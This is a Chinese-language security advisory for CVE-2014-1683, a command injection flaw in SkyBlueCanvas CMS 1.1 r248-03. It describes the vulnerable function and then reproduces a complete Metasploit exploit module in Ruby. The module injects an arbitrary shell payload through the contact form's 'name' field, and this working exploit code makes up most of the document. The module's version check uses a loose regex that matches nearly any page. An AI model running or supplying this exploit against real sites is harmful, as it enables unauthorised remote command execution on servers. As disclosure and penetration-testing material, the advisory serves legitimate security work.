发布日期：2014-01-23
更新日期：2014-02-11

受影响系统：

SkyBlueCanvas SkyBlueCanvas 1.1-r248-03

描述：

---

BUGTRAQ  ID: 65129
CVE(CAN) ID: CVE-2014-1683

SkyBlueCanvas是Web内容管理系统。

SkyBlueCanvas 1.1 r248-04之前版本，cms/data/skins/techjunkie/fragments/contacts/functions.php内的函数bashMail在pid参数为4时，可使远程攻击者通过index.php内name、email、subject、message参数里的shell元字符，利用此漏洞执行任意命令。

<*来源：Scott Parish （srp@srparish.net）
  
  链接：http://secunia.com/advisories/56646/
        http://xforce.iss.net/xforce/xfdb/90670
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info={})
    super(update_info(info,
      'Name'           => 'SkyBlueCanvas CMS Remote Code Execution',
      'Description'    => %q{
        This module exploits an arbitrary command execution vulnerability
        in SkyBlueCanvas CMS version 1.1 r248-03 and below.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Scott Parish', # Vulnerability discovery and exploit
          'xistence <xistence[at]0x90.nl>' # Metasploit Module
        ],
      'References'     =>
        [
          ['CVE', '2014-1683'],
          ['OSVDB', '102586'],
          ['BID', '65129'],
          ['EDB', '31183'],
          ['URL', 'http://packetstormsecurity.com/files/124948/SkyBlueCanvas-CMS-1.1-r248-03-Command-Injection.html']
        ],
      'Privileged'     => false,
      'Payload'        =>
        {
          # Arbitrary big number. The payload gets sent as an HTTP
          # response body, so really it's unlimited
          'Space'       => 262144, # 256k
          'DisableNops' => true,
          'Compat' =>
            {
              'ConnectionType' => 'find',
              'PayloadType'    => 'cmd',
              'RequiredCmd'    => 'generic perl ruby bash telnet python'
            }
        },
      'Platform'       => %w{ unix },
      'Targets'        =>
        [
          ['SkyBlueCanvas 1.1 r248', {}]
        ],
      'Arch'           => ARCH_CMD,
      'DisclosureDate' => 'Jan 28 2014',
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('TARGETURI',[true, "The path to the SkyBlueCanvas CMS installation", "/"]),
      ],self.class)
  end

  def check
    uri = normalize_uri(target_uri.path.to_s, "index.php")

    res = send_request_raw('uri' => uri)

    if res and res.body =~ /[1.1 r248]/
      vprint_good("#{peer} - SkyBlueCanvas CMS 1.1 r248-xx found")
      return Exploit::CheckCode::Appears
    end

    Exploit::CheckCode::Safe
  end

  def exploit
    uri = normalize_uri(target_uri.path.to_s, "index.php")

    send_request_cgi({
      'method'  => 'POST',
      'uri'     => uri,
      'vars_get' => { 'pid' => '4' },
      'vars_post' =>
        {
          'cid' => '3',
          'name' => "#{rand_text_alphanumeric(10)}\";#{payload.encoded};",
          'email' => rand_text_alphanumeric(10),
          'subject' => rand_text_alphanumeric(10),
          'message' => rand_text_alphanumeric(10),
          'action' => 'Send'
        }
    })
  end
end

建议：

---

厂商补丁：

SkyBlueCanvas
-------------
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

http://skybluecanvas.com/

浏览次数：2614
严重程度：0（网友投票）